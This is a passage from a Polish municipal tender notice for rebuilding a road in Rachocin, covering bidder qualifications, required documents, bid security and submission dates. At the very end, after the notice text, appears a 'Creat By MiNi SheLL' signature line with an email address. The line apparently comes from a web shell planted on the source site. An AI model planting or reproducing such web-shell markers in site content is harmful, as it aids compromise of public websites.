tysięcy złotych 00/100).<br/><br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana<br/>przez Zamawiającego, w oparciu o informacje zawarte w:<br/> - formularzu ofertowym według załącznika nr 1 do SWZ;<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika nr 2 do SWZ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu<br/> według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - dokumencie potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/> w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/> min. 400.000,00 zł (przez „opłaconą” polisę Zamawiający rozumie załączenie wraz z polisą <br/> ubezpieczeniową dowodu potwierdzającego uiszczenie składki za tą polisę ubezpieczeniową <br/> od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem <br/> zamówienia).<br/><br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie osób zdolnych do wykonania zamówienia.<br/> Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponować następującymi <br/> osobami:<br/> - co najmniej jedną osobą posiadającą kwalifikacje zawodowe niezbędne do sprawowania funkcji <br/> kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi <br/> w specjalności drogowej.<br/><br/>Uwaga:<br/>· za uprawnienia budowlane odpowiadające wyżej uznane zostaną uprawnienia, które wydane zostały <br/> na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane <br/> obywatelom państw członkowskim Unii Europejskiej, Konfederacji Szwajcarskiej lub państw <br/> członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy<br/> o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art. 12a oraz innych przepisów ustawy <br/> Prawo budowlane (j.t.: Dz. U. z 2023r. poz. 682 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015r. <br/> o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/> Europejskiej (j.t.: Dz. U. z 2023r. poz. 334 ).<br/>· dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu <br/> zamówienia) – dla osób, które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy <br/> z dnia 7 lipca 1994r. Prawo budowlane lub stwierdzenie posiadania przygotowania zawodowego <br/> do pełnienia samodzielnych funkcji technicznych budownictwie i zachowały uprawnienia do pełnienia <br/> tych funkcji w dotychczasowym zakresie.<br/><br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, <br/>w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika nr 2 do SWZ ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału <br/> w postępowaniu według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - wykazie osób skierowanych przez wykonawcę do realizacji zamówienia<br/> publicznego – według załącznika nr 8 do SWZ. <br/> - dokumencie potwierdzającym posiadanie uprawnień budowlanych do kierowania <br/> robotami budowlanymi w specjalności drogowej oraz aktualne zaświadczenie <br/> o członkostwie we właściwych izbach samorządu zawodowego.<br/><br/>b) W zakresie doświadczenia zawodowego niezbędnego do wykonania zamówienia. <br/> Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie:<br/> - co najmniej 2 robót budowlanych polegającej na budowie, modernizacji lub przebudowie drogi<br/> o nawierzchni bitumicznej o długości każda nie mniejszej niż 1000 mb wykonanej nie wcześniej niż <br/> w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/> działalności jest krótszy – w tym okresie.<br/><br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, <br/> w oparciu o informacje zawarte w:<br/> - formularzu ofertowym według załącznika nr 1 do SWZ;<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika nr 2 do SWZ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału <br/> w postępowaniu według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - wykazie wykonanych robót budowlanych według załącznika nr 7 do SWZ; <br/> - w dowodach określających, czy roboty te zostały wykonane w sposób należyty oraz <br/> wykazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo <br/> ukończone. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione <br/> przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej <br/> przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych <br/> dokumentów – inne dokumenty. W przypadku składania oferty wspólnej w/w warunki <br/> będą oceniane łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą:<br/>1.2. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie<br/> art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 3 do SWZ); <br/>2. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą jeśli dotyczą:<br/>2.1. Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu <br/> z postępowania (zgodnie z treścią załącznika nr 3a do SWZ);<br/>3. Podmiotowe środki dowodowe składane przez wykonawcę na wezwanie.<br/>3.1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności <br/> do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/> konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył <br/> odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, <br/> albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/> informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku <br/> o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej <br/> samej grupy kapitałowej – (zgodnie z załącznikiem nr 6 do SWZ);<br/>3.2. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp., <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji.<br/>3.3. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie <br/> zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego <br/> nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem <br/> podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów <br/> potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał <br/> płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności;<br/>3.4. Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej <br/> Zakładu ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej <br/> placówki terenowej kasy Rolniczego ubezpieczenia Społecznego potwierdzające, że <br/> wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie <br/> art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne <br/> wraz z zaświadczeniem albo innym dokumentem zamawiający żąda aby przed upływem <br/> terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia <br/> społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie <br/> w sprawie spłat tych należności;<br/>3.5. Opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca <br/> jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/> z przedmiotem zamówienia na sumę gwarancyjną min. 400.000,00 zł (przez „opłaconą” polisę <br/> Zamawiający rozumie załączenie do oferty wraz z polisą ubezpieczeniową dowodu <br/> potwierdzającego uiszczenie składki za tą polisę ubezpieczeniową od odpowiedzialności <br/> cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia);<br/>3.6. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/> o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia<br/> z postępowania (załącznik nr 10 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą:<br/>1.1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu <br/> – składane na podstawie art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 2 do SWZ);<br/>2. Podmiotowe środki dowodowe składane przez wykonawcę wraz z ofertą jeśli dotyczą:<br/>2.1. Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków udziału <br/> w postępowaniu (zgodnie z treścią załącznika nr 2a do SWZ).<br/>2.2. Oświadczenie z art. 117 ust. 4 ustaw Pzp – Wykonawców wspólnie ubiegających się <br/> o udzielenie zamówienia – (zgodnie z treścią załącznika nr 4 do SWZ);<br/>2.3. Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych <br/> zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie z treścią <br/> załącznika nr 5 do SWZ);<br/>3. Podmiotowe środki dowodowe składane przez wykonawcę na wezwanie.<br/>3.1. Wykaz robót budowlanych obejmujący wykonanie co najmniej 2 robót budowlanych<br/> polegających na budowie, modernizacji lub przebudowie drogi o nawierzchni bitumicznej <br/> o długości każda nie mniejszej niż 1000 mb wykonanej nie wcześniej niż w okresie ostatnich <br/> 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy - w tym okresie – (zgodnie z załącznikiem nr 7 do SWZ). Wykaz ten powinien obejmować <br/> rodzaj wykonanych robót, długość odcinka drogi, datę wykonania, miejsce wykonania i nazwę <br/> podmiotu, na rzecz którego roboty te zostały wykonane. Do wykazu robot budowlanych należy <br/> dołączyć dowody określające, czy te roboty budowlane zostały wykonane należycie, oraz <br/> wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo <br/> ukończone przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/> przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca <br/> z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie <br/> dokumenty. Wskazany wyżej wykaz robót Wykonawcy stanowi jedynie minimalne wymagania <br/> dla spełnienia warunku udziału w postępowaniu.<br/>3.2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wskazujący <br/> w szczególności: co najmniej jedną osobę posiadającą uprawnienia do kierowania robotami <br/> budowlanymi w specjalności drogowej (zgodnie z załącznikiem nr 8 do SWZ). Wykaz powinien <br/> obejmować imię i nazwisko osoby, która będzie posiadać w/w uprawnienia, informację dotyczącą <br/> podstawy dysponowania osobą, kwalifikacje zawodowe, wykształcenie, zakres wykonywanych <br/> czynności, doświadczenie. Do wykazu należy dołączyć dokumenty potwierdzające posiadanie <br/> uprawnień budowlanych do kierowania robotami budowlanymi w specjalności drogowej <br/> oraz aktualne zaświadczenie o członkostwie we właściwych izbach samorządu zawodowego. <br/> Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie minimalne wymagania dla <br/> spełnienia warunku udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dokumenty składane przez wykonawcę wraz z ofertą:<br/>1.2. Dowód potwierdzający wniesienie wadium.<br/>2.2. Pełnomocnictwo<br/>- w przypadku złożenia oferty wspólnej pełnomocnictwo udzielone liderowi;<br/> - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych (KRS, <br/> CEiDG lub innego właściwego rejestru), wykonawca który składa ofertę za pośrednictwem <br/> pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym <br/> zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy; <br/> - upoważnienie (pełnomocnictwo) musi w swej treści jednoznacznie wskazywać uprawnienia <br/> do podpisania oferty lub do podpisania oferty i umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta winna być zabezpieczona wadium w wysokości 6.000,00 zł<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium w formie <br/> pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. <br/><br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 29.06.2023r.<br/> licząc od dnia upływu terminu składania ofert. <br/><br/>4. Wykonawca może wnieść wadium w: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/> (j.t.: Dz. U. z 2020 r. poz. 299 oraz z 2022 r. poz. 807 i 1079).<br/><br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić wadium <br/> przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Starej Białej Oddział w Sierpcu, <br/> nr konta: 52 9015 0001 2005 0000 0521 0012, z dopiskiem na przelewie: <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: „Przebudowa drogi gminnej w m. Rachocin”.<br/><br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w wyznaczonym <br/> terminie składania ofert znajduje się na wskazanym rachunku bankowym Zamawiającego. <br/><br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie wadium <br/> w pieniądzu na rachunek bankowy Zamawiającego. <br/><br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa oryginał <br/> dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten powinien być podpisany <br/> kwalifikowanym podpisem elektronicznym przez jego wystawcę. <br/><br/><br/>10. Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każdym pisemne <br/> żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta <br/> do wypłaty Zamawiającemu pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/> ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/> i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/> do oferty.<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/> o których mowa w Rozdziale XIV pkt. 2.1. i 2.2. SWZ, składa każdy z wykonawców. <br/> Oświadczenia te potwierdzają brak podstaw wykluczenia oraz oświadczenie o spełnianiu <br/> warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków <br/> udziału w postępowaniu. <br/><br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/> z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy zgodnie <br/> z załącznikiem nr 4 do SWZ.<br/><br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony przewidują możliwość dokonywania zmian postanowień niniejszej Umowy.<br/><br/>2. W przypadku każdej zmiany, o której mowa powyżej, po stronie wnoszącego propozycję zmian <br/> leży uzasadnienie powstałej okoliczności, a wniosek o zmianę postanowień umowy musi być <br/> wyrażony na piśmie.<br/><br/>3. Wszelkie zmiany, uzupełnienia treści niniejszej Umowy mogą być dokonane za zgodą obu stron <br/> w formie pisemnego aneksu pod rygorem nieważności. Każdy sporządzony aneks dla swej <br/> ważności wymaga podpisu obu Stron niniejszej Umowy.<br/><br/>4. Zgodnie z art. 455 ustawy Pzp strony dopuszczają możliwość zmiany postanowień zawartej <br/> Umowy w zakresie:<br/>1) realizacji, przez dotychczasowego wykonawcę dodatkowych robót budowlanych, których nie <br/> uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione <br/> łącznie następujące warunki:<br/> a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, <br/> w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub <br/> instalacji zamówionych w ramach zamówienia podstawowego,<br/> b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów <br/> dla zamawiającego, <br/> c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej <br/> umowy. <br/>2) wynagrodzenia w przypadku ustawowej zmiany podatku VAT.<br/>3) zmiany terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, <br/>4) zmiany umowy w przypadku zmiany przepisów prawa obowiązujących na dzień zawarcia umowy <br/> w zakresie mającym wpływ na realizację umowy. <br/>5) zmiany sposobu wykonania Umowy w razie, gdy jest niezbędna ze względów technicznych, <br/> technologicznych lub organizacyjnych, o ile zmiana taka jest korzystna dla Zamawiającego lub <br/> konieczna w celu prawidłowego wykonania Umowy, a brak zmiany sposobu wykonania umowy <br/> skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy pod warunkiem, że <br/> Wykonawca zaoferuje rozwiązania techniczne, technologiczne lub organizacyjne o równoważnych <br/> lub lepszych parametrach.<br/>6) zmiany technologii wykonania, rezygnacji z wykonania części robót. <br/>7) gdy konieczność wprowadzenia zmian będzie następstwem zmian, wytycznych lub zaleceń <br/> instytucji, która przyznała środki na sfinansowanie zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-31 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com